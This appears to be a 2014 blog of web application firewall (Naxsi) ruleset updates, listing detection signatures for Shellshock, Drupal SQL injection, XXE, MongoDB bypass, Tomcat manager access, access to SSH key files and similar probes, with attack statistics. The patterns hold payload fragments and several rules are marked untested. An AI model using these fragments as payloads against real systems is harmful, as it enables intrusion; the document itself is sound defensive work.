Freitag, 31. Oktober 2014

Ruleset-Update: Reflected File Download


ruleset-update with a testing-signature for Reflected File Download; beware of False-Positives; this sig is heavily untested and might break existing downloads

for the vuln itself please read the following artikles from Oren Hafif:
- Blog: Reflected File Download - A New Web Attack Vector
- Paper: Reflected File Download a New Web Attack Vector


[+] new sigs:
  42000408 :: Drupal SQLI & RCE-Exploit Attempt #2 (rx)
  42000410 :: Windows-Exe/Command - File download (cmd, bat, exe,...)
MainRule "rx:[\w*]\.(bat|cmd|vbs|wsh|vbe|wsf|hta)[\W]{0,}$" "msg:Reflected File Download / Windows-Command - File download (cmd, bat, exe,...)" "mz:URL" "s:$ATTACK:8" id:42000410  ;


sigs are already pushed and available: https://bitbucket.org/lazy_dogtown/doxi-rules/src/


cheers,


mex

Sonntag, 26. Oktober 2014

Ruleset-Update: Magento/MAGMI-Rules + MongoDB - Bypass


the following sigs are against exploiting MAGMI, a popular Magento-plugin with sever security-problems (or better:  a backdoor with 0 security at all); credits goes to bui from naxsi-team for pointing me onto it and @sonassi for finding and writing about the problemes

additional signature is a mongodb-auth-bypass; please read the referenced blogpost for more information.


the sigs has been pushed to the repo on wednesday last week already
https://bitbucket.org/lazy_dogtown/doxi-rules/



[+] new sigs:
  42000400 :: app_server.rules     :: MongoDB Negated Parameter Server Side JavaScript Injection Attempt
  42000401 :: web_apps.rules       :: Magento - MAGMI-Access (possible Scan)
  42000403 :: web_apps.rules       :: Magento - MAGMI - Plugin-Upload
  42000404 :: web_apps.rules       :: Magento - MAGMI - magmi_*.php - Access
  42000405 :: web_apps.rules       :: Magento - MAGMI - clearcatalog.php
  42000406 :: web_apps.rules       :: Magento - MAGMI - ajax_readlocalxml.php
  42000407 :: web_apps.rules       :: Magento - MAGMI - Access


#
# sid: 42000400 | date: 2014-10-20 - 14:31
#
# # et-inspired
# http://blog.imperva.com/2014/10/nosql-ssji-authentication-bypass.html
# https://lists.emergingthreats.net/pipermail/emerging-sigs/2014-October/024974.html
#
MainRule "str:[$ne]" "msg:MongoDB Negated Parameter Server Side JavaScript Injection Attempt" "mz:BODY|ARGS" "s:$ATTACK:8" id:42000400  ;

#
# sid: 42000407 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/magmi/" "msg:Magento - MAGMI - Access" "mz:URL" "s:$ATTACK:8" id:42000407  ;
    
      
#
# sid: 42000406 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/52317634845896704
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/ajax_readlocalxml.php" "msg:Magento - MAGMI - ajax_readlocalxml.php" "mz:URL" "s:$ATTACK:8" id:42000406  ;
    
      
#
# sid: 42000405 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/clearcatalog.php" "msg:Magento - MAGMI - clearcatalog.php" "mz:URL" "s:$ATTACK:8" id:42000405  ;
    
      
#
# sid: 42000404 | date: 2014-10-26 - 12:36
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "rx:/web/magmi_([a-z]*).php" "msg:Magento - MAGMI - magmi_*.php - Access" "mz:URL" "s:$ATTACK:8" id:42000404  ;
    
      
#
# sid: 42000403 | date: 2014-10-26 - 12:37
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/plugin_upload.php" "msg:Magento - MAGMI - Plugin-Upload " "mz:URL" "s:$ATTACK:8" id:42000403  ;
    
      
#
# sid: 42000401 | date: 2014-10-26 - 12:37
#
# https://twitter.com/sonassi/status/523176348458967040
# http://www.exploit-db.com/exploits/35052/
#
MainRule "str:/web/magmi.php" "msg:Magento - MAGMI-Access (possible Scan)" "mz:URL" "s:$ATTACK:8" id:42000401  ;



Freitag, 17. Oktober 2014

Ruleset-Update: Drupal SQLI & RCE-Exploit Attempt (CVE-2014-3704)

please note: the sig is against the exploit/POC and wouldnt hold against fancy urlencoding like "name%5b" 

BUT: the attack WILL be blocked by naxsi because of 3 rules from core-rule-set at least, thus my sig is for the attack, not the vuln. emerging sigs have all possible encodings,

 Emerging Threat Signatures: http://pastebin.com/raw.php?i=NZnfzGCc
 POC: http://pastebin.com/F2Dk9LbX

 References:

  • https://www.drupal.org/SA-CORE-2014-005
  • http://www.reddit.com/r/netsec/comments/2jbu8g/sacore2014005_drupal_core_sql_injection/
  • http://pastebin.com/F2Dk9LbX

MainRule "str:name[0%20" "msg:Drupal SQLI & RCE-Exploit Attempt (CVE-2014-3704)" "mz:BODY" "s:$ATTACK:8" id:42000399  ;



The Rule has been pushed to Doxi-Rules at 2014-10-16 already: 
https://bitbucket.org/lazy_dogtown/doxi-rules

Mittwoch, 24. September 2014

Ruleset-Update: Possible Remote code execution through Bash CVE-2014-6271 and some Scanner-Sigs

most important: ID 42000393 / Possible Remote code execution through Bash CVE-2014-6271 (see references below)

Updates are available through Doxi-Rules https://bitbucket.org/lazy_dogtown/doxi-rules/overview

german blogpost with additional infos on CVE-2014-6271 / Possible Remote code execution through Bash


[+] new sigs:
  42000386 :: web_server.rules     :: Nullbyte - Termination \0
  42000387 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000388 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000389 :: scanner.rules        :: Open Proxy-Autoconfig-Scan
  42000390 :: scanner.rules        :: UPNP-Scan
  42000391 :: web_server.rules     :: authorized_keys - Access
  42000392 :: web_server.rules     :: known_hosts Access
  42000393 :: web_server.rules     :: Possible Remote code execution
through Bash CVE-2014-6271 :

#
# sid: 42000393 | date: 2014-09-25 - 00:37
#
# http://seclists.org/oss-sec/2014/q3/649
# https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
# http://seclists.org/oss-sec/2014/q3/650
# http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
#
MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393  ;


#
# sid: 42000391 | date: 2014-09-24 - 16:41
#
# ssh authorized_keys - access
#
MainRule "str:/authorized_keys" "msg:authorized_keys - Access"
"mz:URL" "s:$UWA:8" id:42000391  ;


#
# sid: 42000386 | date: 2014-09-02 - 08:40
#
# http://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
#
MainRule "str:\0" "msg:Nullbyte - Termination \0" "mz:BODY|URL|ARGS"
"s:$ATTACK:8" id:42000386  ;

#
# sid: 42000390 | date: 2014-09-23 - 20:50
#
# https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
#
MainRule "str:/gatedesc.xml" "msg:UPNP-Scan" "mz:URL" "s:$UWA:8" id:42000390  ;


#
# sid: 42000389 | date: 2014-09-23 - 20:49
#
# http://en.wikipedia.org/wiki/Proxy_auto-config
#
MainRule "str:wpad.dat" "msg:Open Proxy-Autoconfig-Scan" "mz:URL"
"s:$UWA:8" id:42000389  ;


#
# sid: 42000388 | date: 2014-09-23 - 20:49
#
# http://en.wikipedia.org/wiki/Proxy_auto-config
# https://isc.sans.edu/forums/diary/Web+Scan+looking+for+infowhitelistpac/18675
#
MainRule "str:proxy.pac" "msg:Open Proxy-Autoconfig-Scan" "mz:URL"
"s:$UWA:8" id:42000388  ;


#
# sid: 42000387 | date: 2014-09-23 - 20:49
#
# https://isc.sans.edu/forums/diary/Web+Scan+looking+for+infowhitelistpac/18675
#
MainRule "str:/whitelist.pac" "msg:Open Proxy-Autoconfig-Scan"
"mz:URL" "s:$UWA:8" id:42000387  ;

Donnerstag, 17. Juli 2014

Ruleset-Update; RosettaFlash + some JAVA-Serialized-Object POST - sigs

most interesting is probably that RosettaFlash-Sig; @mikispag helped me getting the regex right

btw, there is also an rails-update available, adressing that issue (https://github.com/rails/rails/pull/16109) but there is no  official note yet on the railssec-ml.


new signatures are available and pushed to the repo: https://bitbucket.org/lazy_dogtown/doxi-rules/src




[+] new sigs:
  42000385 :: app_server.rules     :: RosettaFlash JSONP-Exploit callback=CWS
  42000381 :: web_server.rules     :: Meterpreter-UA detected
  42000382 :: web_server.rules     :: local File access via file://
  42000383 :: app_server.rules     :: JAVA-Serialized-Object POST
  42000384 :: app_server.rules     :: JAVA-Serialized-Object POST / Class=*

--------------------------------------------------


#
# sid: 42000385 | date: 2014-07-17 - 09:45 
#
# http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
# http://miki.it/RosettaFlash/RosettaFlash.pdf
# http://quaxio.com/jsonp_handcrafted_flash_files/
# 
# credits to @mikispag helped me getting the regex right
#
MainRule "rx:^CWS\w{5}hC\w{50,}" "msg:RosettaFlash JSONP-Exploit callback=CWS" "mz:$ARGS_VAR:callback" "s:$ATTACK:8" id:42000385  ;
      
#
# sid: 42000382 | date: 2014-05-21 - 23:38 
#
# http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
#
MainRule "str:file://" "msg:local File access via file://" "mz:BODY|ARGS" "s:$UWA:8" id:42000382  ;
      
#
# sid: 42000384 | date: 2014-06-22 - 14:57 
#
# http://www.exploit-db.com/exploits/28713/
#
MainRule "str:class=" "msg:JAVA-Serialized-Object POST / Class=*" "mz:$HEADERS_VAR:Content-Type " "s:$ATTACK:8" id:42000384  ;
      
       
#
# sid: 42000383 | date: 2014-06-22 - 14:57 
#
# http://www.exploit-db.com/exploits/28713/
#
MainRule "str:java-serialized-object" "msg:JAVA-Serialized-Object POST" "mz:$HEADERS_VAR:Content-Type " "s:$ATTACK:8" id:42000383  ;


------------------------------------------------

# the following is a snort-sig for rosetta-flash, 
# totally untested, for your leisure

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS 
(msg:"RosettaFlash Exploit-Attempt"; flow:established,to_server; 
uricontent:"?callback=CWS"; nocase; uricontent="hC", within:9; 
pcre:"/callback=CWS\w{5}hC\w{50,}/i"; 
reference:url,miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/;
reference:url, miki.it/RosettaFlash/RosettaFlash.pdf;
reference:quaxio.com/jsonp_handcrafted_flash_files/;
classtype:web-application-attack;  sid:42010101023; rev:2;)  






Donnerstag, 8. Mai 2014

Ruleset-Update: Tomcat-Manager - Sigs & misc Scanner-Rules






Rules-Repo:
  • https://bitbucket.org/lazy_dogtown/doxi-rules/src 

Updates:

  • Struts-0day-Sigs (already pushed 3 weeks ago)
  • Tomcat-Manager-Sigs to detect access to certain Manager-Command-Calls from the outside
  • misc scanner -sigs


[+] new sigs:
  42000361 :: scanner.rules        :: JAVA-UA, possible Scanner
  42000362 :: scanner.rules        :: Bash-Profile et al Scan
  42000363 :: scanner.rules        :: ScanAlert Vulnerability Scaner
  42000364 :: scanner.rules        :: Sucuri Vulnerability Scaner
  42000365 :: scanner.rules        :: SiteLock Vulnerability Scanner
  42000366 :: scanner.rules        :: OpenVAS - Scanner
  42000367 :: app_server.rules     :: Java-Classloader-Call
  42000368 :: web_server.rules     :: Facebook External Hit
  42000369 :: app_server.rules     :: Tomcat-Manager/deploy-command
  42000370 :: app_server.rules     :: Tomcat-Manager/list-command
  42000371 :: app_server.rules     :: Tomcat-Manager/reload-command
  42000372 :: app_server.rules     :: Tomcat-Manager/serverinfo-command
  42000373 :: app_server.rules     :: Tomcat-Manager/resources-command
  42000374 :: app_server.rules     :: Tomcat-Manager/sessions-command
  42000375 :: app_server.rules     :: Tomcat-Manager/start-command
  42000376 :: app_server.rules     :: Tomcat-Manager/stop-command
  42000377 :: app_server.rules     :: Tomcat-Manager/undeploy-command
  42000378 :: app_server.rules     :: Tomcat-Manager/findleaks-command
  42000379 :: app_server.rules     :: Tomcat-Manager/serverstatus-command
  42000380 :: app_server.rules     :: Tomcat-Manager/jmxproxy-access



#
# sid: 42000380 | date: 2014-05-02 - 20:23 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/jmxproxy/" "msg:Tomcat-Manager/jmxproxy-access" "mz:URL" "s:$UWA:8" id:42000380  ;
      
       
#
# sid: 42000379 | date: 2014-05-02 - 17:48 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/serverstatus" "msg:Tomcat-Manager/serverstatus-command" "mz:URL" "s:$UWA:8" id:42000379  ;
      
       
#
# sid: 42000378 | date: 2014-05-02 - 17:47 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/findleaks" "msg:Tomcat-Manager/findleaks-command" "mz:URL" "s:$UWA:8" id:42000378  ;
      
       
#
# sid: 42000377 | date: 2014-05-02 - 17:46 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/undeploy" "msg:Tomcat-Manager/undeploy-command" "mz:URL" "s:$UWA:8" id:42000377  ;
      
       
#
# sid: 42000376 | date: 2014-05-02 - 17:46 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/stop" "msg:Tomcat-Manager/stop-command" "mz:URL" "s:$UWA:8" id:42000376  ;
      
       
#
# sid: 42000375 | date: 2014-05-02 - 17:45 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/start" "msg:Tomcat-Manager/start-command" "mz:URL" "s:$UWA:8" id:42000375  ;
      
       
#
# sid: 42000374 | date: 2014-05-02 - 17:45 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/sessions" "msg:Tomcat-Manager/sessions-command" "mz:URL" "s:$UWA:8" id:42000374  ;
      
       
#
# sid: 42000373 | date: 2014-05-02 - 17:44 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/resources" "msg:Tomcat-Manager/resources-command" "mz:URL" "s:$UWA:8" id:42000373  ;
      
       
#
# sid: 42000372 | date: 2014-05-02 - 17:44 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/serverinfo" "msg:Tomcat-Manager/serverinfo-command" "mz:URL" "s:$UWA:8" id:42000372  ;
      
       
#
# sid: 42000371 | date: 2014-05-02 - 17:43 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/reload" "msg:Tomcat-Manager/reload-command" "mz:URL" "s:$UWA:8" id:42000371  ;
      
       
#
# sid: 42000370 | date: 2014-05-02 - 17:43 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/list" "msg:Tomcat-Manager/list-command" "mz:URL" "s:$UWA:8" id:42000370  ;
      
       
#
# sid: 42000369 | date: 2014-05-02 - 17:42 
#
# http://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Supported_Manager_Commands
#
MainRule "str:/manager/text/deploy" "msg:Tomcat-Manager/deploy-command" "mz:URL" "s:$UWA:8" id:42000369  ;

#
# sid: 42000368 | date: 2014-04-27 - 08:03 
#
# http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/
# https://www.mare-system.de/news/mare/1398410520/
#
MainRule "str:facebookexternalhit" "msg:Facebook External Hit" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:7" id:42000368  ;

       
#
# sid: 42000367 | date: 2014-04-24 - 21:15 
#
# http://struts.apache.org/release/2.3.x/docs/s2-020.html
# http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/
#
MainRule "str:classloader" "msg:Java-Classloader-Call" "mz:BODY|ARGS" "s:$UWA:8" id:42000367  ;


#
# sid: 42000366 | date: 2014-04-24 - 09:57 
#
# 
#
MainRule "str:openvas" "msg:OpenVAS - Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000366  ;
      
       
#
# sid: 42000365 | date: 2014-04-24 - 09:54 
#
# 
#
MainRule "str:sitelock" "msg:SiteLock Vulnerability Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000365  ;
      
       
#
# sid: 42000364 | date: 2014-04-24 - 09:54 
#
# 
#
MainRule "str:sucuri" "msg:Sucuri Vulnerability Scaner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000364  ;
      
       
#
# sid: 42000363 | date: 2014-04-24 - 09:52 
#
# http://www.botopedia.org/index.php?option=com_k2&view=item&id=350:scanalert-bot
#
MainRule "str:scanalert" "msg:ScanAlert Vulnerability Scaner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000363  ;
      
       
#
# sid: 42000362 | date: 2014-04-24 - 09:46 
#
# 
#
MainRule "str:.bash" "msg:Bash-Profile et al Scan" "mz:URL" "s:$UWA:8" id:42000362  ;
      
       
#
# sid: 42000361 | date: 2014-04-19 - 17:19 
#
# 
#
MainRule "str:java/" "msg:JAVA-UA, possible Scanner" "mz:$HEADERS_VAR:User-Agent" "s:$UWA:8" id:42000361  ;
      



Montag, 14. April 2014

Ruleset-Update: Contao & Typo3-Signatures


- some sigs, based on a recent contao-vuln https://github.com/contao/core/issues/6855
- some generic sigs to detect config_option_injection in contao and typo3


fff

[+] new sigs:
  42000356 :: web_apps.rules       :: Contao VAR TL_* - Injection
  42000357 :: web_apps.rules       :: Contao-InstallTool-Access
  42000358 :: web_apps.rules       :: Typo3-Backend-Access
  42000359 :: web_apps.rules       :: TYPO3_CONF_* Value - Injection
  42000360 :: web_apps.rules       :: Contao-Install install.php - Access

#
# sid: 42000360 | date: 2014-04-14 - 21:23
#
# https://github.com/contao/core/issues/6855#issuecomment-39571171
#
MainRule "str:/contao/install.php" "msg:Contao-Install install.php - Access" "mz:URL" "s:$UWA:8" id:42000360  ;
     
       
#
# sid: 42000359 | date: 2014-04-14 - 21:20
#
#
#
MainRule "str:typo3_conf" "msg:TYPO3_CONF_* Value - Injection" "mz:ARGS" "s:$UWA:8" id:42000359  ;
     
       
#
# sid: 42000358 | date: 2014-04-14 - 21:15
#
#
#
MainRule "str:/typo3/" "msg:Typo3-Backend-Access" "mz:URL" "s:$UWA:8" id:42000358  ;
     
       
#
# sid: 42000357 | date: 2014-04-14 - 21:14
#
# https://github.com/contao/check
#
MainRule "str:installer" "msg:Contao-InstallTool-Access" "mz:$ARGS_VAR:c" "s:$UWA:8" id:42000357  ;
     
       
#
# sid: 42000356 | date: 2014-04-14 - 20:43
#
# https://github.com/contao/core/issues/6855
# https://github.com/contao/core/pull/6863/files
#
MainRule "str:tl_" "msg:Contao VAR TL_* - Injection" "mz:ARGS" "s:$UWA:8" id:42000356  ;


Naxsi - Stats

- text-only version: https://gist.github.com/anonymous/10679230

# 30-days - Naxsi-Stats (3 sensors, 10 domains)
# 2014-04-14

count | id       |  message
------+-----------+-----------------------------
1880   1000       sql keywords
1721   1200       double dot
1646   1202       obvious probe
1420   10         10
1332   1310       [, possible js
1332   1311       ], possible js
1229   42000030   DN WEB_SERVER /proc/self - Access in URI
1028   42000316   DN SCAN WinHttpRequest - UA
1000   1100       http:// scheme
773    1001       double quote
746    1002       0x, possible hex encoding
741    1007       mysql comment (--)
739    1013       simple quote
655    1205       backslash
598    1016       mysql comment (#)
582    42000244   DN SCAN PHPMyAdmin - Scanner (2)
431    1303       html close tag
420    42000170   DN SCAN Scanner sqlmap
404    42000062   DN WEB_SERVER Generic JOOMLA-Exploit-Attempt (option=com_)
394    42000309   DN SCAN Misformed Proxy-Scan
379    1302       html open tag
291    42000261   DN WEB_SERVER possible WP-Scan (wp-login)
179    1009       equal in var, probable sql/xss
153    1314       grave accent !
148    42000313   DN SCAN Joomlas Administrator-Login-Attempt
131    42000317   DN SCAN Wordpress-UA, probably Botnet-Attack
112    12         12
97     42000262   DN WEB_SERVER possible WP-Scan (wp-admin)
94     11         11
76     42000310   DN SCAN Abnormal double http:// in HTTP header,
71     42000243   DN SCAN PHPMyAdmin - Scanner
64     1006       mysql keyword (&&)
60     42000047   DN WEB_SERVER PHPMyAdmin - Scripts/Setup-Request
60     42000071   DN WEB_APPS PHPMYADMIN setup.php - Access
56     1312       ~ character
44     42000311   DN SCAN poss. malicious Scanner using Fake UA Apache/Synapse
31     42000254   DN WEB_SERVER possible INI - File - Access
30     42000227   DN SCAN Scanner ZmEu exploit scanner
30     42000285   DN WEB_SERVER Joomla JCE-Exploit-Scan
28     1402       Content is neither mulipart/x-www-form..
26     1003       mysql comment (/*)
26     42000305   DN SCAN Possible HNAP-Exploit-Attempt
25     2            2
22     42000021   DN WEB_SERVER Tilde in URI, potential .php source disclosure vulnerability
22     42000271   DN WEB_SERVER ForumSpammer Access
22     42000319   DN SCAN Possible WHMCS - Scan
21     42000181   DN SCAN Scanner webster pro
20     42000128   DN SCAN Nessus-Scanner detected
19     1315       double encoding !
19     42000048   DN WEB_SERVER PHPINFO - in URL
18     1103       php:// scheme
17     14         14
13     42000203   DN SCAN Scanner Paros Proxy Scanner
13     42000321   DN SCAN probably Malicous UA
12     42000077   DN WEB_SERVER LIBWWW_perl-UA detected
12     42000307   DN SCAN WP-Contents/Plugins Access
8      42000082   DN WEB_SERVER Tomcat - Manager - Access
8      42000253   DN WEB_SERVER possible INC - File - Access
7      42000046   DN SCAN DFind w00tw00t GET-Requests
7      42000052   DN WEB_SERVER SVN_Repo-Access
7      42000070   DN WEB_SERVER possible sql-injection (CAST())
7      42000236   DN WEB_SERVER DoubleDot in URL
7      42000263   DN WEB_SERVER .htaccess - Access
6      1004       mysql comment (*/)
5      1010       parenthesis, probable sql/xss
5      42000002   DN APP_SERVER PHP-file-access
5      42000076   DN SCAN VTI_BIN - Access
4      42000054   DN WEB_SERVER HEX_string found
4      42000068   DN WEB_SERVER JAR - Download Request
4      42000156   DN SCAN Scanner safexplorer
3      42000003   DN APP_SERVER ASP_file access
3      42000043   DN SCAN WhatWeb Web Application Fingerprint Scanner Default User-Agent Detected
3      42000073   DN SCAN Python-urllib UA, possible Scanner
3      42000127   DN SCAN Scanner Amiga-Aweb
3      42000151   DN SCAN Scanner whatweb
2      1005       mysql keyword (|)
2      1101       https:// scheme
2      42000053   DN WEB_SERVER GIT_Repo-Access
2      42000079   DN WEB_SERVER VTI_RPC - Access
2      42000080   DN WEB_SERVER Apache ServerStatus - Access
2      42000145   DN SCAN Scanner morfeus
2      42000265   DN WEB_SERVER Plesk Apache Zeroday Remote Exploit - possible scan
2      42000306   DN SCAN Morfeus - F*cking-Scanner
1      1400       utf7/8 encoding
1      42000031   DN SCAN Muieblackcat scanner
1      42000032   DN WEB_SERVER PHP-EVAL - Attempt
1      42000049   DN WEB_SERVER PHP_SYSTEM_CMD
1      42000226   DN SCAN Scanner WITOOL SQL Injection Scan 



Donnerstag, 3. April 2014

Ruleset-Update: 30 critical Java / Oracle _Cloud - Vulns published by Adam Gowdiak

CAUTION: these rules are untested, since we dont run any weblogic-server or oracle-cloud-services and might break stuff. please test carefully before deploying

Adam Gowdiak published 30+ critical vulns and pocs against oracle's java-cloud and weblogic-server; see http://www.security-explorations.com/en/about.html

after short skimming through the exploit-codes i came up with some rules to possibly detect some malicious access-attempts


[+] new sigs:
  42000346 :: app_server.rules     :: Possible Java-Beans-Injection
  42000347 :: web_apps.rules       :: Possible Wordpress-Plugin-Backdoor detected
  42000348 :: app_server.rules     :: Possible Java.Lang - Injection (URL-Args & POST-Body)
  42000349 :: app_server.rules     :: Possible JAR-File Upload
  42000350 :: app_server.rules     :: Possible WAR - File Upload
  42000351 :: app_server.rules     :: Possible JSP - File Upload
  42000352 :: app_server.rules     :: Properties-File Access / Upload
  42000353 :: app_server.rules     :: Content-Type x-java-serialized-object
  42000354 :: app_server.rules     :: WebLogicServer wls_deployment_internal - Access
  42000355 :: app_server.rules     :: WebLogicServer wls_internal - Access



#
# sid: 42000355 | date: 2014-04-03 - 23:00 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_internal/" "msg:WebLogicServer wls_internal - Access" "mz:URL" "s:$UWA:8" id:42000355  ;
      
       
#
# sid: 42000354 | date: 2014-04-03 - 22:59 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_deployment_internal/" "msg:WebLogicServer wls_deployment_internal - Access" "mz:URL" "s:$UWA:8" id:42000354  ;
      
       
#
# sid: 42000353 | date: 2014-04-03 - 22:58 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:x-java-serialized-object" "msg:Content-Type x-java-serialized-object" "mz:$HEADERS_VAR:Content-Type " "s:$UWA:8" id:42000353  ;
      
       
#
# sid: 42000352 | date: 2014-04-03 - 22:54 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.properties" "msg:Properties-File Access / Upload" "mz:URL|FILE_EXT" "s:$UWA:8" id:42000352  ;
      
       
#
# sid: 42000351 | date: 2014-04-03 - 22:51 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.jsp" "msg:Possible JSP - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000351  ;
      
       
#
# sid: 42000350 | date: 2014-04-03 - 22:41 
#
# 
#
MainRule "str:.war" "msg:Possible WAR - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000350  ;
      
       
#
# sid: 42000349 | date: 2014-04-03 - 22:42 
#
# 
#
MainRule "str:.jar" "msg:Possible JAR-File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000349  ;
      
       
#
# sid: 42000348 | date: 2014-04-03 - 21:57 
#
# phew! http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:java.lang." "msg:Possible Java.Lang - Injection (URL-Args & POST-Body)" "mz:BODY|ARGS" "s:$UWA:8" id:42000348  ;
      
       
#
# sid: 42000346 | date: 2014-03-20 - 19:44 
#
# http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
# ref - sid: 42000286
#
MainRule "str:java.beans.eventhandler" "msg:Possible Java-Beans-Injection" "mz:BODY|ARGS" "s:$UWA:8" id:42000346  ;
      

Dienstag, 18. März 2014

Ruleset-Update: PHP Object Injection - Rule and some Spam-Rules

#
# sid: 42000343 | date: 2014-03-18 - 22:41 
#
# multiple vulns found lately 
# http://karmainsecurity.com/analysis-of-the-joomla-php-object-injection-vulnerability
# https://www.mare-system.de/news/secbulletin/1392018237/
# http://vagosec.org/2013/09/wordpress-php-object-injection/
# http://blog.sucuri.net/2014/03/security-exploit-patched-on-vbulletin-php-object-injection.html
# http://www.php.net/manual/de/function.serialize.php
#
MainRule "rx:O:\d+:.*:\d+:{(s|S):\d+:.*;.*}" "msg:possible PHP Object Injection" "mz:BODY|ARGS|HEADERS" "s:$ATTACK:8" id:42000343  ;
      
(EDIT 2015-12-14 - included HEADERS in MZ, see http://blog.dorvakt.org/2015/12/ruleset-update-jenkins-exploits-joomla.html )


#
# sid: 42000344 | date: 2014-03-18 - 13:49 
#
# http://www.heise.de/security/meldung/Hunderte-Typo3-Webseiten-gehackt-2148372.html
#
MainRule "str:casino" "msg:Possible Casino-Spam  (casino in URL)" "mz:URL" "s:$UWA:8" id:42000344  ;
      
       

#
# sid: 42000345 | date: 2014-03-18 - 13:50 
#
# 
#
MainRule "str:roulette" "msg:Possible Casino-Spam  (roulette in URL)" "mz:URL" "s:$UWA:8" id:42000345  ;
      
       

Sonntag, 16. Februar 2014

Ruleset-Update: Tomcat/Apache-Commons File Upload DOS Attempt CVE-2014-0050

#
# sid: 42000342 |  date: 2014-02-16 - 00:54:09 | maker: lazydog
# 
# http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E
# http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html
 

MainRule "rx:multipart\/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}" "msg:DN APP_SERVER Tomcat/Apache-Commons File Upload DOS Attempt" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000342 ;  

---------------- P.S.: Trustwave suggests the following ModSecurity-Rule:
SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Donnerstag, 30. Januar 2014

Ruleset-Update:: XXE-Vuln and Websocket-Upgrade-Detection

Ruleset Download



thanx to sensepost.com for a fast support and helping to understand the vulnerability and providing additional information for signature-creation. remarks: we'll probably see more of this later, since the vulnerability will affect a lot more systems that use php + xml-parsing. rce'ing like it's rails-time again; the vuln-description from sensepost.cpom and the blogpost by r.silva is worth a read.
#
#
# sid: 42000341 |  date: 2014-01-31 - 00:21:19 | maker: lazydog
# 
# credits: 
# - sensepost.com for a nice generic vuln- analysis 
#   http://sensepost.com/blog/10178.html
# - Reginaldo Silva for his blogpost about a server facebook-vuln
#   http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
# 
#  
# 
# 
 
MainRule "rx:<!ENTITY(.*)SYSTEM" "msg:DN WEB_SERVER possible XML/XXE-Exploitation atempt" "mz:BODY" "s:$UWA:8" id:42000341 ; 


-----------------------------------------------

tl;dr: after checking out sec-stuff around websockets: DONT WANT (atm)

#
# sid: 42000340 |  date: 2014-01-31 - 00:21:47 | maker: lazydog
# 
# Attempt to connect to a Websocket
 
